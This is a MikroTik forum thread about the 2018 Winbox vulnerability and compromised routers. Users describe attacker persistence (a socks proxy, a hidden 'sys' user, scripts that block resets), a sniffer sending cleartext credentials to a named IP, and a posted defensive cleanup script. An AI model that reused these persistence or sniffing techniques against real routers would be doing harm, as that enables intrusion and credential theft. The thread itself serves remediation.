Community discussions

 
User avatar
43north
Member Candidate
Member Candidate
Posts: 181
Joined: Fri Nov 14, 2014 7:06 am

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 2:52 am

It was empty where I checked, too. It's possibly just a presence indicator in the swarm for the C&C as you also mentioned...
As I mentioned my file was empty as well, makes sense with what you guys are saying.
 
kobuki
Member Candidate
Member Candidate
Posts: 118
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 3:00 am

Is he trying to use Winbox to connect
No idea, but possible.
how would you route a Winbox connection through a socks proxy?
I assume that's a rhetorical question.
 
excession
just joined
Posts: 12
Joined: Mon May 11, 2015 8:16 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 3:19 am

Is he trying to use Winbox to connect
No idea, but possible.
how would you route a Winbox connection through a socks proxy?
I assume that's a rhetorical question.
Haha, actually no, just one based on an almost complete ignorance of socks!
I did just find some interesting discussion here: viewtopic.php?t=101874
I think I now understand: I imagine he used an ssh client to open the socks connection then ssh to connect to his router through that tunnel.
 
aswin
just joined
Posts: 5
Joined: Tue Jul 11, 2017 6:26 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 4:15 am

2. I have try to login to remote mikrotik with that password but no success so I think the problem come from the hacker allow only IP 127.0.0.1 to login with "sys" account.
And the hacker use script to disable hard reset, so I just ask can I use the serial cable to login. (infected router is still locate on other place)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.
Smart idea. Is he trying to use Winbox to connect and if so how would you route a Winbox connection through a socks proxy?
From kobuki suggestion,I use http to login via sock not winbox.
 
blackzero
just joined
Posts: 18
Joined: Tue Aug 09, 2011 3:40 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 12:26 pm

***
 
sporkman
just joined
Posts: 24
Joined: Thu May 02, 2013 4:37 am

Re: Winbox vulnerability: please upgrade

Thu Aug 09, 2018 8:59 am

If you're curious how the bug works, this article is a good read:

https://n0p.me/winbox-bug-dissection/

The vulnerability would have been less of a problem if Mik used industry-standard password-hashing methods - since the vulnerability was allowing a remote attacker to download any file, and there's a file with a very weak encryption of the admin password, it makes getting a legit login really easy. If the password were properly encrypted, then the attacker would be out of luck or at best, have to spend lots of effort cracking the password. And the better your password was, the harder to crack...

The bit about how Winbox fetches unsigned DLLs from the router is frightening as hell. You have a signed app (Winbox) grabbing DLLs (unsigned) from the router - imagine what an attacker could do by loading a trojaned DLL onto your Winbox-running PC.

I also saw a new variation on a hacked router today - they had started a packet sniffer watching for port 20, 21, 110 and 143 traffic and sending it off to a listener on the host 37.1.207.114. Fun trick! Looking for any cleartext passwords I assume. If they were more adventurous, they'd grab 5060 UDP and make some free phone calls too.
 
User avatar
mrz
MikroTik Support
MikroTik Support
Posts: 5589
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: Winbox vulnerability: please upgrade

Thu Aug 09, 2018 10:25 am

Winbox do not fetch DLLS for quite some time now. Do not use old winbox.
 
sporkman
just joined
Posts: 24
Joined: Thu May 02, 2013 4:37 am

Re: Winbox vulnerability: please upgrade

Thu Aug 09, 2018 10:51 am

Winbox do not fetch DLLS for quite some time now. Do not use old winbox.
Don't tell me, tell the guy that wrote the blog post. He did see it happen in his tcpdump though, I don't think he wrote that more than 3-4 months ago.
 
allstarcomps
just joined
Posts: 19
Joined: Sat Jul 08, 2017 10:36 pm
Location: San Diego, CA, USA
Contact:

Re: Winbox vulnerability: please upgrade

Tue Aug 14, 2018 12:11 am

Here is the script I wrote to clean up after IP-socks/user service attacked some of the old routers I have. After cleaning up it downloads the latest ROS and does a midnight reboot to install the latest ROS and firmware. I do recommend testing in a lab before deploying in production. I did not check for disabled drop rules.
/system logging action set memory-lines=1000 [find where name=memory]
/ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];
/ip socks set enabled=no port=1080 max-connections=200 connection-idle-timeout=00:02:00;
/ip socks access remove [/ip socks access find];
/system script remove [find where source~"mikrotik.php"]
/system script remove [find where source~"socks set enabled=yes"]
/system scheduler remove [find where name~"port"]
/system scheduler remove [find where owner="service"]
/user remove [find name=service]

/system scheduler
add name=midnightReboot on-event="/system reboot \r\
    \ny" start-time=23:59:00
/system scheduler
add name=updateFirmware on-event="/system scheduler remove [find where name=\"up\
    dateFirmware\"]\r\
    \n:delay 2s\r\
    \n/system scheduler remove [find where name=\"midnightReboot\"]\r\
    \n/system routerboard upgrade\r\
    \n:delay 10s\r\
    \n/system reboot\r\
    \ny" start-time=startup
/system package update download

Who is online

Users browsing this forum: kivimart, sindy, yreks and 5 guests